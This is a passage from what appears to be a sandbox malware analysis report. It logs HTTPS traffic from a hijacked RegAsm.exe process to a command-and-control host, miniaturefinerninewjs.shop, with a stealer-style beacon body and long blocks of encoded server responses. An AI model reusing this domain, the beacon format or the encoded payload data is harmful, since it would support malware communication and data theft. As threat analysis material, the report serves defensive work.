2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 33 38 62 38 0d 0a 48 49 76 35 46 55 56 6d 4b 30 57 4b 6b 49 2b 57 47 6a 52 41 67 61 43 49 6c 71 64 75 57 72 69 66 76 44 6e 66 53 65 32 6c 4e 35 38 57 6e 66 45 56 55 33 4e 74 50 2b 61 4f 77 76 31 33 4b 43 7a 71 79 73 32 55 72 79 59 47 39 74 44 36 65 37 49 74 69 4f 55 2b 68 6c 76 44 74 31 68 38 64 6d 55 37 36 70 76 47 37 6d 41 58 61 74 2f 49 78 70 2b 73 4f 45 4b 53 74 4b 56 37 73 69 33 36 7a 56 4c 31 57 35 7a 35 57 41 73 6a 4b 79 54 7a 6e 63 58 34 65 69 59 36 2b 4d 48 4d 6b 4b 6f 70 44 66 76 55 76 7a 6e 51 54 65 65 33 4d 5a 63 59 69 66 45 59 57 47 74 74 62 61 2f 6e 71 70 55 78 4b 6a 43 71 6b 34 72 52 6a 79 4d 53 39 74 53 73 4d 73 70 7a 34 4b 73 33 6d 51 33 62 6e 58 4e 4d 4c 77 4e 47 2b 4f 65 71 6c 54 45 71 4a 4b 71 54 69 74 47 6b 49 51 33 79 33 37 73 78 31 Data Ascii: 38b8HIv5FUVmK0WKkI+WGjRAgaCIlqduWrifvDnfSe2lN58WnfEVU3NtP+aOwv13KCzqys2UryYG9tD6e7ItiOU+hlvDt1h8dmU76pvG7mAXat/Ixp+sOEKStKV7si36zVL1W5z5WAsjKyTzncX4eiY6+MHMkKopDfvUvznQTee3MZcYifEYWGttba/nqpUxKjCqk4rRjyMS9tSsMspz4Ks3mQ3bnXNMLwNG+OeqlTEqJKqTitGkIQ3y37sx1
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 53 39 56 75 63 37 56 67 4c 49 79 73 64 37 49 50 4b 38 6a 4d 59 4b 2b 54 46 7a 34 66 72 52 6d 6e 6c 6b 64 4a 65 77 79 36 49 7a 6e 6d 5a 46 39 75 74 57 68 4e 75 61 69 44 72 68 4d 2f 79 63 43 30 73 36 63 48 49 6e 71 34 6f 43 76 50 66 71 44 4c 56 52 2b 4b 75 4d 70 4d 56 6e 76 51 64 56 43 45 6c 52 59 72 6b 67 66 6c 70 62 58 43 6f 69 2b 57 34 6b 57 35 71 6b 63 44 30 58 62 46 66 69 38 35 53 33 68 79 58 74 55 41 52 49 57 38 6e 34 59 4c 4c 39 58 34 75 4c 2b 54 4c 78 5a 75 35 4a 67 4c 36 30 62 77 30 31 6b 50 69 71 54 71 4d 46 35 33 34 48 6c 74 7a 4b 32 4f 4a 35 4b 71 2b 64 6a 56 6f 73 6f 6d 49 73 61 41 69 41 66 62 65 76 58 66 37 54 4f 43 75 4e 64 77 75 6d 50 73 57 56 48 63 72 52 59 71 51 6a 35 59 61 4e 45 43 42 6f 49 69 57 70 32 35 61 75 4a 2b 2b 4d 64 5a 47 35 4b Data Ascii: S9Vuc7VgLIysd7IPK8jMYK+TFz4frRmnlkdJewy6IznmZF9utWhNuaiDrhM/ycC0s6cHInq4oCvPfqDLVR+KuMpMVnvQdVCElRYrkgflpbXCoi+W4kW5qkcD0XbFfi85S3hyXtUARIW8n4YLL9X4uL+TLxZu5JgL60bw01kPiqTqMF534HltzK2OJ5Kq+djVosomIsaAiAfbevXf7TOCuNdwumPsWVHcrRYqQj5YaNECBoIiWp25auJ++MdZG5K
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 6b 76 34 55 57 47 56 6e 4a 4f 53 4a 77 50 74 30 4c 43 7a 6d 77 63 36 53 71 43 45 4e 39 64 66 36 65 37 49 74 69 4f 55 2b 68 6c 76 44 74 31 68 32 64 6d 41 6a 35 38 2b 70 6c 57 35 6a 51 49 48 53 6f 50 72 41 62 67 58 32 6e 2b 4a 33 6d 6b 72 71 6f 7a 2b 62 46 35 72 7a 45 46 5a 70 62 79 7a 6e 69 63 4c 78 64 53 67 70 35 63 2f 45 6e 36 45 76 41 2f 62 55 74 54 37 66 42 71 33 4e 55 76 56 62 6e 4f 31 59 43 79 4d 72 48 4f 4b 5a 31 75 35 39 62 55 43 42 31 49 62 35 77 44 64 71 6b 62 54 36 4d 74 59 47 75 2b 64 35 6e 77 6d 52 2f 78 5a 57 62 6d 34 75 37 6f 6a 4d 2b 48 30 6e 49 65 4c 4e 78 35 69 35 4c 51 37 30 32 4c 51 35 31 45 76 70 70 6a 54 65 56 66 4f 65 63 78 4e 6d 63 32 32 35 7a 59 48 53 64 69 41 47 34 63 66 50 30 63 4e 46 48 62 53 33 30 53 79 79 4c 59 6a 6c 50 70 4a Data Ascii: kv4UWGVnJOSJwPt0LCzmwc6SqCEN9df6e7ItiOU+hlvDt1h2dmAj58+plW5jQIHSoPrAbgX2n+J3mkrqoz+bF5rzEFZpbyznicLxdSgp5c/En6EvA/bUtT7fBq3NUvVbnO1YCyMrHOKZ1u59bUCB1Ib5wDdqkbT6MtYGu+d5nwmR/xZWbm4u7ojM+H0nIeLNx5i5LQ702LQ51EvppjTeVfOecxNmc225zYHSdiAG4cfP0cNFHbS30SyyLYjlPpJ
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 46 64 71 59 79 48 6b 68 38 54 2f 65 53 63 67 35 63 54 61 6b 4b 51 6e 42 66 48 53 74 54 76 66 53 50 47 69 4d 70 55 54 6b 76 73 65 45 79 38 44 52 6f 72 50 78 75 59 78 64 57 71 71 2f 63 75 66 6f 44 38 4e 2b 64 50 36 58 62 46 5a 72 63 31 53 68 33 50 77 6e 6c 68 55 62 53 74 31 6f 38 2f 4e 38 48 45 69 4a 4f 62 41 77 4a 43 6e 49 41 58 2f 31 72 49 39 79 45 66 6e 72 54 69 51 46 4a 72 78 48 56 5a 6c 62 43 6e 6e 67 49 47 77 47 55 5a 44 71 73 7a 51 30 66 4e 73 51 74 58 59 72 78 54 67 42 6f 76 4f 4a 74 42 7a 38 4f 78 77 4f 41 6f 72 4b 75 33 50 6d 62 77 78 4a 79 50 75 79 4d 79 55 70 43 38 44 2f 4d 32 39 50 4d 68 49 37 71 6f 78 6c 68 4b 61 38 52 31 65 5a 32 63 6e 34 49 6a 50 38 48 6c 74 5a 6f 4b 67 6f 39 47 73 4e 6b 4b 69 6e 66 6f 55 79 6c 33 78 73 7a 53 2f 46 70 53 31 Data Ascii: FdqYyHkh8T/eScg5cTakKQnBfHStTvfSPGiMpUTkvseEy8DRorPxuYxdWqq/cufoD8N+dP6XbFZrc1Sh3PwnlhUbSt1o8/N8HEiJObAwJCnIAX/1rI9yEfnrTiQFJrxHVZlbCnngIGwGUZDqszQ0fNsQtXYrxTgBovOJtBz8OxwOAorKu3PmbwxJyPuyMyUpC8D/M29PMhI7qoxlhKa8R1eZ2cn4IjP8HltZoKgo9GsNkKinfoUyl3xszS/FpS1
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 74 31 6f 38 2f 4b 39 6e 34 2f 4c 65 50 44 7a 4a 69 72 4b 67 6a 33 32 4c 6f 77 31 30 50 6e 71 7a 32 5a 47 35 66 36 48 31 74 75 62 79 33 75 7a 34 2b 57 47 6b 5a 6f 37 64 4f 49 79 65 6c 75 49 76 48 4a 6d 7a 76 52 56 4b 50 4e 55 6f 46 56 38 35 34 42 4f 77 6f 41 62 65 61 44 67 61 59 7a 62 53 62 6a 79 73 43 66 70 79 59 47 36 4e 2b 78 50 4e 56 48 37 4b 55 36 6e 78 47 54 35 78 35 54 61 6d 4d 71 36 59 76 50 37 48 41 69 61 4b 53 6a 6f 2f 72 72 4b 52 71 36 68 2f 68 31 36 31 44 6b 6f 6a 62 63 4d 70 7a 75 47 56 6c 69 59 43 47 68 35 36 72 68 50 30 56 44 38 36 4f 6a 2b 75 73 70 44 72 71 48 2b 48 58 58 53 75 36 68 4b 35 49 62 6d 2f 77 66 57 58 4e 6b 49 75 79 4d 77 66 74 6a 4c 44 72 6c 77 4d 32 53 72 79 45 4e 39 74 65 77 64 5a 51 75 69 4d 35 35 6d 51 50 62 72 56 6f 54 54 Data Ascii: t1o8/K9n4/LePDzJirKgj32Low10Pnqz2ZG5f6H1tuby3uz4+WGkZo7dOIyeluIvHJmzvRVKPNUoFV854BOwoAbeaDgaYzbSbjysCfpyYG6N+xPNVH7KU6nxGT5x5TamMq6YvP7HAiaKSjo/rrKRq6h/h161DkojbcMpzuGVliYCGh56rhP0VD86Oj+uspDrqH+HXXSu6hK5Ibm/wfWXNkIuyMwftjLDrlwM2SryEN9tewdZQuiM55mQPbrVoTT
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 50 67 62 41 5a 52 6b 4f 71 7a 4e 44 52 38 32 78 43 32 63 69 73 50 38 45 47 69 38 34 6d 30 48 50 77 37 48 41 34 43 69 73 71 37 63 2b 5a 76 44 45 67 4c 2b 54 44 7a 70 2b 74 50 41 37 31 32 62 6f 30 30 45 76 76 72 6a 36 51 45 4a 33 77 46 56 4e 6e 62 53 6e 6c 69 38 2f 39 4d 57 4e 41 67 61 43 49 6c 72 4e 75 57 72 69 66 6e 52 6a 72 42 4d 43 79 4c 35 51 63 6c 2b 4d 54 55 6d 4a 39 49 50 48 50 71 5a 56 75 59 30 43 42 30 71 44 36 77 47 34 46 39 70 2f 69 64 35 70 4e 37 61 41 34 6b 68 47 63 2b 77 70 53 61 32 63 73 35 6f 6a 4b 37 48 6f 2f 49 2b 4c 49 78 70 6d 69 4c 67 7a 36 33 72 63 31 6d 67 69 4c 7a 6c 4c 65 48 49 4f 31 51 42 45 68 54 67 37 32 6d 63 75 38 55 6a 6f 2b 34 4d 7a 45 68 36 41 76 41 65 7a 53 71 6e 57 79 4c 66 7a 72 55 66 55 43 38 35 35 7a 45 32 5a 6e 62 62 Data Ascii: PgbAZRkOqzNDR82xC2cisP8EGi84m0HPw7HA4Cisq7c+ZvDEgL+TDzp+tPA712bo00Evvrj6QEJ3wFVNnbSnli8/9MWNAgaCIlrNuWrifnRjrBMCyL5Qcl+MTUmJ9IPHPqZVuY0CB0qD6wG4F9p/id5pN7aA4khGc+wpSa2cs5ojK7Ho/I+LIxpmiLgz63rc1mgiLzlLeHIO1QBEhTg72mcu8Ujo+4MzEh6AvAezSqnWyLfzrUfUC855zE2Znbb
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 47 6d 30 75 71 70 4f 4b 77 65 56 47 61 5a 47 66 76 69 53 61 48 71 48 31 61 38 56 4f 79 4b 4a 49 41 51 6b 41 4d 71 2f 6e 71 75 63 5a 52 6b 4f 71 33 59 6a 4a 36 58 78 4d 6b 72 54 52 64 63 67 47 75 2b 64 35 32 52 57 57 39 42 74 64 59 6e 6b 2f 35 34 7a 58 2f 54 59 54 46 73 76 47 77 35 32 6d 49 51 6e 45 34 5a 73 34 30 55 72 75 71 6a 4b 67 4a 59 37 32 46 6c 31 6d 66 54 79 68 77 61 6d 56 47 6d 30 6e 71 70 4f 4b 71 4f 74 6d 51 73 57 52 30 6c 36 78 42 76 76 6c 59 64 78 62 72 76 59 57 58 57 5a 39 50 4b 79 75 7a 50 56 39 49 43 66 68 69 34 62 35 77 45 56 43 2f 4a 2f 69 64 34 6f 49 69 38 35 53 33 68 2b 4b 74 55 41 52 4d 54 6c 32 74 4e 79 57 72 69 4e 46 51 2f 57 46 6f 50 71 79 52 6d 6d 52 6e 36 78 31 67 67 53 78 36 31 48 31 63 4e 76 6e 57 41 73 6a 4b 32 72 69 6e 64 50 Data Ascii: Gm0uqpOKweVGaZGfviSaHqH1a8VOyKJIAQkAMq/nqucZRkOq3YjJ6XxMkrTRdcgGu+d52RWW9BtdYnk/54zX/TYTFsvGw52mIQnE4Zs40UruqjKgJY72Fl1mfTyhwamVGm0nqpOKqOtmQsWR0l6xBvvlYdxbrvYWXWZ9PKyuzPV9ICfhi4b5wEVC/J/id4oIi85S3h+KtUARMTl2tNyWriNFQ/WFoPqyRmmRn6x1ggSx61H1cNvnWAsjK2rindP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49765	104.21.30.191	443	5544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:32 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: miniaturefinerninewjs.shop
2024-05-06 05:53:32 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
2024-05-06 05:53:32 UTC	824	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:53:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=32u2at455invs57dps280cm7ng; expires=Thu, 29-Aug-2024 23:40:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RK8bwZoZdilGynADU7tuy%2F%2B%2BntH98%2FlUQv%2BXI5559jxq7A4b8hE7T6RvNVr2ZpRTH4Fs%2F29yKpVmw7KSYRAqLezElUAu%2BSa0eIpm2TYk9jdOXwE8WOCSHUdSxeVUZYDOzMW7WUPNXUsmGuZvVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b5e258102230-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:53:32 UTC	545	IN	Data Raw: 34 66 63 0d 0a 71 63 44 38 73 71 34 36 62 64 50 41 43 48 6e 70 57 71 6e 79 4b 6f 68 36 78 38 43 4c 53 61 71 41 69 67 73 76 77 69 43 37 6a 43 76 53 79 76 57 51 32 42 68 58 38 2f 51 6b 63 2b 42 34 32 70 63 49 73 6c 71 7a 73 76 34 73 68 6f 71 44 4b 55 36 6d 41 6f 47 73 54 63 69 73 6a 39 65 43 4d 47 54 78 72 58 42 62 30 33 72 79 2b 43 50 7a 63 4d 37 4a 71 53 7a 45 6f 72 41 72 44 62 56 46 32 65 6c 54 33 61 57 53 77 63 64 56 41 35 4f 74 62 51 32 49 4e 38 69 42 51 61 59 54 71 4f 4b 6e 51 36 4f 4a 71 47 35 56 34 42 71 62 72 6d 62 4d 74 4a 33 2f 7a 30 6b 47 38 65 77 43 63 4f 42 34 7a 49 59 49 73 6c 72 6c 6e 4b 6b 35 79 2f 4c 72 5a 6c 79 65 41 6f 48 33 64 34 75 70 69 4e 66 63 57 78 6d 36 72 32 59 4b 74 58 69 54 78 42 71 34 53 76 66 77 39 6d 75 67 69 66 63 42 4a 70 Data Ascii: 4fcqcD8sq46bdPACHnpWqnyKoh6x8CLSaqAigsvwiC7jCvSyvWQ2BhX8/Qkc+B42pcIslqzsv4shoqDKU6mAoGsTcisj9eCMGTxrXBb03ry+CPzcM7JqSzEorArDbVF2elT3aWSwcdVA5OtbQ2IN8iBQaYTqOKnQ6OJqG5V4BqbrmbMtJ3/z0kG8ewCcOB4zIYIslrlnKk5y/LrZlyeAoH3d4upiNfcWxm6r2YKtXiTxBq4Svfw9mugifcBJp
2024-05-06 05:53:32 UTC	738	IN	Data Raw: 51 4e 65 73 67 41 4a 55 79 43 6d 79 72 6b 37 48 34 73 61 53 6a 46 34 42 73 4b 39 71 43 59 4d 7a 77 4a 56 61 34 52 47 6f 72 2b 6b 6d 77 75 33 72 61 55 71 71 53 4e 62 6b 54 63 61 76 6d 4e 44 4d 47 45 48 5a 79 51 46 62 6a 43 43 4c 79 41 71 71 4f 36 43 79 37 69 66 65 6f 4e 49 70 4a 63 74 64 6c 34 55 4c 69 63 72 31 79 61 51 7a 5a 50 47 6c 5a 6c 76 54 65 6f 75 59 54 65 6b 62 72 71 33 71 49 38 50 77 36 48 74 4c 72 55 66 4c 36 45 7a 46 71 4a 33 43 78 6c 59 4a 73 71 74 68 45 6f 34 2f 7a 39 41 47 67 6e 50 4f 34 75 34 7a 69 4c 71 71 4b 57 79 74 53 64 58 6b 58 73 76 69 39 72 76 54 46 6d 66 61 75 77 4a 77 34 48 6a 4d 6e 41 69 79 57 75 57 6d 36 43 2f 4a 35 75 5a 6e 53 61 78 45 31 2b 4e 47 7a 61 69 65 31 38 5a 51 42 37 43 76 59 52 53 4c 50 63 61 55 54 75 59 5a 6f 4f 4b Data Ascii: QNesgAJUyCmyrk7H4saSjF4BsK9qCYMzwJVa4RGor+kmwu3raUqqSNbkTcavmNDMGEHZyQFbjCCLyAqqO6Cy7ifeoNIpJctdl4ULicr1yaQzZPGlZlvTeouYTekbrq3qI8Pw6HtLrUfL6EzFqJ3CxlYJsqthEo4/z9AGgnPO4u4ziLqqKWytSdXkXsvi9rvTFmfauwJw4HjMnAiyWuWm6C/J5uZnSaxE1+NGzaie18ZQB7CvYRSLPcaUTuYZoOK
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 33 38 62 38 0d 0a 33 76 35 46 78 72 53 5a 6b 4b 51 7a 45 50 2f 4b 41 51 4c 6a 55 36 44 51 54 2b 5a 59 2f 65 43 70 4c 63 54 6e 35 32 64 4e 72 6b 50 55 36 45 33 47 6f 6f 7a 57 33 6c 38 4f 73 71 46 73 48 6f 38 34 79 70 56 4e 37 68 43 68 72 75 5a 72 68 6f 71 44 41 67 32 6e 57 70 6d 32 43 34 75 4e 69 64 37 61 55 78 75 32 73 6e 73 68 79 51 33 49 6e 6b 62 74 44 75 58 4b 67 6a 53 47 69 6f 4e 77 4a 63 73 70 6d 65 6c 46 69 2f 72 63 6b 4d 56 4b 48 62 57 6b 59 52 43 5a 4b 73 47 55 53 65 73 66 71 71 50 69 4c 73 54 6f 34 32 31 66 71 45 76 61 2f 45 33 4c 71 5a 54 57 6a 42 5a 6e 32 73 6b 71 48 4a 4e 34 6b 39 49 49 7a 68 57 31 72 75 49 39 7a 2f 4c 64 61 6b 4f 75 52 63 2b 75 49 61 43 39 30 4c 69 6e 51 57 66 61 79 53 6f 63 68 33 69 54 30 67 6a 6c 46 36 71 71 36 53 72 4d 37 Data Ascii: 38b83v5FxrSZkKQzEP/KAQLjU6DQT+ZY/eCpLcTn52dNrkPU6E3GoozW3l8OsqFsHo84ypVN7hChruZrhoqDAg2nWpm2C4uNid7aUxu2snshyQ3InkbtDuXKgjSGioNwJcspmelFi/rckMVKHbWkYRCZKsGUSesfqqPiLsTo421fqEva/E3LqZTWjBZn2skqHJN4k9IIzhW1ruI9z/LdakOuRc+uIaC90LinQWfaySoch3iT0gjlF6qq6SrM7
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 4c 4b 5a 6e 70 55 59 76 36 33 4a 44 38 56 51 4f 36 72 69 67 75 69 44 62 46 6c 31 36 71 63 4d 36 39 70 30 4f 6a 2b 34 41 43 4a 75 42 46 31 61 34 52 69 65 4b 52 30 63 46 53 42 4c 2b 75 61 78 75 50 4f 38 47 51 52 2b 38 65 72 61 76 70 4f 63 2f 74 36 57 68 47 71 30 2f 58 36 30 6a 4f 70 64 36 65 70 44 4e 6b 38 61 56 79 57 39 4e 36 69 37 31 68 30 46 6a 4e 79 66 5a 6c 6f 49 6e 78 41 53 62 4c 41 74 37 69 43 5a 50 67 33 74 54 47 57 41 4b 37 71 57 55 59 6a 44 62 4c 6e 55 4c 34 45 4b 57 69 35 79 33 4a 37 75 31 6f 51 61 4e 51 31 65 68 45 7a 61 71 4d 6b 49 49 77 5a 4e 72 69 62 51 50 4c 59 49 6e 51 61 4f 45 55 70 71 37 6f 4c 49 72 44 34 6d 70 47 72 41 44 73 37 55 66 46 70 59 69 51 70 44 4d 51 2f 38 6f 42 41 75 4e 54 6f 4e 42 50 35 6c 6a 39 34 4b 6b 76 7a 4f 37 6f 62 6b Data Ascii: LKZnpUYv63JD8VQO6riguiDbFl16qcM69p0Oj+4ACJuBF1a4RieKR0cFSBL+uaxuPO8GQR+8eravpOc/t6WhGq0/X60jOpd6epDNk8aVyW9N6i71h0FjNyfZloInxASbLAt7iCZPg3tTGWAK7qWUYjDbLnUL4EKWi5y3J7u1oQaNQ1ehEzaqMkIIwZNribQPLYInQaOEUpq7oLIrD4mpGrADs7UfFpYiQpDMQ/8oBAuNToNBP5lj94KkvzO7obk
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 35 30 4c 48 71 5a 72 63 78 56 30 4a 73 4b 64 76 47 6f 38 30 77 5a 5a 4c 36 52 65 71 72 65 46 72 68 6f 71 44 41 67 32 6e 57 70 6d 32 43 34 75 48 69 64 76 43 58 6b 2f 5a 79 58 56 56 34 31 50 53 2b 43 4f 42 57 4b 4b 75 71 58 4f 4b 6f 75 52 67 53 36 5a 48 31 65 39 50 77 36 65 57 31 4d 31 65 43 62 4b 74 62 68 36 4b 4e 38 2b 63 52 75 41 5a 70 4b 37 69 4a 4d 50 6e 71 43 63 6c 79 79 6d 5a 36 56 47 4c 2b 74 79 51 2f 56 73 5a 70 72 4a 6d 57 2b 4e 54 31 4e 34 67 67 51 48 4e 79 59 4a 72 7a 2b 36 6f 4d 51 2f 67 51 38 76 6b 51 38 57 6e 6b 64 58 50 56 77 69 38 70 47 59 52 67 6a 44 4e 6e 30 48 34 47 36 6d 73 37 69 58 45 37 4f 56 6a 54 71 30 43 6c 34 59 69 6f 4f 4b 5a 79 49 77 41 54 66 47 4f 62 52 61 6c 4d 38 65 58 43 49 4a 7a 75 75 79 42 51 4e 47 4b 67 77 49 4e 70 30 36 Data Ascii: 50LHqZrcxV0JsKdvGo80wZZL6ReqreFrhoqDAg2nWpm2C4uHidvCXk/ZyXVV41PS+COBWKKuqXOKouRgS6ZH1e9Pw6eW1M1eCbKtbh6KN8+cRuAZpK7iJMPnqCclyymZ6VGL+tyQ/VsZprJmW+NT1N4ggQHNyYJrz+6oMQ/gQ8vkQ8WnkdXPVwi8pGYRgjDNn0H4G6ms7iXE7OVjTq0Cl4YioOKZyIwATfGObRalM8eXCIJzuuyBQNGKgwINp06
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 36 61 56 32 4d 42 64 42 37 53 6a 59 68 47 44 4e 38 53 43 53 65 55 52 6f 71 6e 6b 4a 4d 62 6e 35 6e 74 4b 71 30 6e 52 35 30 66 4e 34 74 43 34 70 7a 4e 50 74 72 6f 71 51 38 6c 34 2f 5a 4e 47 34 51 6d 71 6f 65 56 72 6f 49 6e 33 4a 79 58 4c 57 37 47 46 49 6f 75 6c 6b 70 43 55 47 6b 2b 39 72 47 6f 55 68 7a 54 41 6d 45 6e 6d 46 71 4b 6e 34 43 50 41 38 4f 6c 74 52 61 46 4d 31 75 39 4e 7a 71 65 61 31 38 68 65 41 50 48 73 41 6e 44 67 65 4d 79 49 43 4c 4a 61 35 59 33 75 50 75 6e 59 71 41 45 6d 76 77 79 78 68 56 43 6a 79 66 57 51 79 31 52 50 36 65 41 71 45 59 41 38 79 4a 52 4e 35 52 6d 6b 70 50 73 73 77 66 44 6d 5a 45 4b 6f 53 74 44 76 54 63 36 76 6d 4e 7a 47 57 51 69 2f 72 47 4a 62 78 56 43 67 2b 77 6a 74 41 4f 58 36 71 32 76 70 38 76 4e 37 57 36 31 6a 31 4f 45 4a Data Ascii: 6aV2MBdB7SjYhGDN8SCSeURoqnkJMbn5ntKq0nR50fN4tC4pzNPtroqQ8l4/ZNG4QmqoeVroIn3JyXLW7GFIoulkpCUGk+9rGoUhzTAmEnmFqKn4CPA8OltRaFM1u9Nzqea18heAPHsAnDgeMyICLJa5Y3uPunYqAEmvwyxhVCjyfWQy1RP6eAqEYA8yJRN5RmkpPsswfDmZEKoStDvTc6vmNzGWQi/rGJbxVCg+wjtAOX6q2vp8vN7W61j1OEJ
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 43 55 47 6b 2b 36 71 6d 55 4a 6a 6a 48 44 6c 45 48 71 48 4b 2b 76 37 69 76 4e 37 2b 31 74 51 36 52 46 32 65 4a 47 7a 4b 71 52 31 4d 78 58 54 2f 2f 4b 41 58 44 4c 50 39 50 51 45 4b 68 59 68 61 6e 2f 43 73 62 70 2b 69 6b 6c 79 31 32 58 68 69 4c 53 79 76 57 37 6a 46 38 44 38 66 6f 6f 57 34 55 78 79 70 68 47 35 68 43 68 73 4f 6b 67 77 65 33 70 5a 6b 32 6a 51 39 50 6d 57 38 32 69 6c 64 6a 4c 55 41 75 2f 73 47 73 55 79 33 61 6a 2b 79 4f 71 48 37 33 69 73 57 6d 49 30 2f 35 75 53 71 38 41 38 4f 6c 53 79 71 69 64 32 38 41 59 5a 39 71 39 4a 48 50 67 49 61 50 37 49 36 6f 66 71 65 4b 78 61 59 6a 76 35 47 52 4a 73 6b 37 5a 37 6b 44 4d 71 49 7a 66 77 31 55 4d 73 61 64 34 47 70 6b 33 77 4a 56 4c 37 68 65 71 72 75 45 68 69 4b 79 41 41 69 62 67 52 63 47 75 45 59 6e 69 73 Data Ascii: CUGk+6qmUJjjHDlEHqHK+v7ivN7+1tQ6RF2eJGzKqR1MxXT//KAXDLP9PQEKhYhan/Csbp+ikly12XhiLSyvW7jF8D8fooW4UxyphG5hChsOkgwe3pZk2jQ9PmW82ildjLUAu/sGsUy3aj+yOqH73isWmI0/5uSq8A8OlSyqid28AYZ9q9JHPgIaP7I6ofqeKxaYjv5GRJsk7Z7kDMqIzfw1UMsad4Gpk3wJVL7heqruEhiKyAAibgRcGuEYnis
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 50 38 65 77 43 63 4f 42 34 7a 49 67 49 73 6c 72 6c 67 66 34 39 77 76 6d 6f 41 53 61 2f 44 4c 47 46 55 4b 50 4a 39 5a 44 4c 56 45 2f 70 34 43 6f 57 6a 44 62 44 6c 6b 62 73 43 71 6d 74 37 79 76 4a 36 4f 56 6c 52 71 64 4d 30 75 68 4d 78 71 4b 59 31 73 68 63 43 37 2b 68 4b 6c 58 6a 55 36 44 51 54 2f 4a 59 2f 65 43 70 44 4f 58 54 71 6b 70 61 74 6b 6a 65 34 6c 2f 41 6f 35 33 47 77 55 68 50 32 63 6c 31 56 65 4e 54 30 76 67 6a 67 56 69 69 72 71 6c 7a 69 71 4c 6a 5a 30 69 68 54 74 50 70 52 39 6d 6a 6c 4e 7a 4e 58 77 69 36 73 47 45 4a 67 44 44 49 6e 6b 44 6a 47 4b 75 69 36 43 62 49 6f 71 59 42 4a 73 73 43 33 76 59 4a 6b 2b 44 65 39 65 39 50 47 62 76 67 53 51 79 64 4d 73 79 63 58 75 45 5a 70 72 54 6b 4f 34 69 4b 67 33 59 44 79 43 6e 41 68 69 4b 67 34 70 6e 63 6a 41 Data Ascii: P8ewCcOB4zIgIslrlgf49wvmoASa/DLGFUKPJ9ZDLVE/p4CoWjDbDlkbsCqmt7yvJ6OVlRqdM0uhMxqKY1shcC7+hKlXjU6DQT/JY/eCpDOXTqkpatkje4l/Ao53GwUhP2cl1VeNT0vgjgViirqlziqLjZ0ihTtPpR9mjlNzNXwi6sGEJgDDInkDjGKui6CbIoqYBJssC3vYJk+De9e9PGbvgSQydMsycXuEZprTkO4iKg3YDyCnAhiKg4pncjA
2024-05-06 05:53:32 UTC	1369	IN	Data Raw: 41 56 75 4e 65 4a 50 53 47 4b 52 77 7a 73 6d 70 4c 39 6d 69 73 43 73 64 38 68 6d 4d 76 52 36 62 38 50 61 37 30 78 5a 6e 32 72 73 43 63 4f 42 34 33 64 41 51 71 45 72 72 79 6f 4a 41 69 50 43 6f 4d 51 2f 67 42 64 66 6a 53 4d 69 73 6e 63 4c 65 58 67 79 6e 6f 53 30 6c 74 52 6e 47 6d 30 54 6e 46 36 36 63 31 77 72 46 36 65 52 6b 51 71 74 38 35 2f 74 4b 78 61 79 5a 78 74 30 59 51 64 6e 4a 41 56 75 45 65 4a 50 53 63 61 70 51 35 5a 32 6e 51 36 4f 4a 71 48 45 4e 2b 41 43 5a 32 30 72 46 72 4a 6e 47 33 52 55 75 76 4b 6c 6d 46 6f 51 7a 69 39 34 67 67 58 50 6c 70 4b 6c 7a 69 72 4b 6d 41 53 62 4c 41 74 33 2f 43 5a 50 67 7a 6f 4b 58 44 56 7a 6d 38 6a 68 7a 34 43 65 46 2b 43 50 7a 63 4d 37 4a 71 54 32 49 75 71 6f 37 41 38 67 70 73 71 35 62 69 2f 72 63 6b 49 74 62 48 61 4f Data Ascii: AVuNeJPSGKRwzsmpL9misCsd8hmMvR6b8Pa70xZn2rsCcOB43dAQqErryoJAiPCoMQ/gBdfjSMisncLeXgynoS0ltRnGm0TnF66c1wrF6eRkQqt85/tKxayZxt0YQdnJAVuEeJPScapQ5Z2nQ6OJqHEN+ACZ20rFrJnG3RUuvKlmFoQzi94ggXPlpKlzirKmASbLAt3/CZPgzoKXDVzm8jhz4CeF+CPzcM7JqT2Iuqo7A8gpsq5bi/rckItbHaO

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49767	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:53:32 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: miniaturefinerninewjs.shop
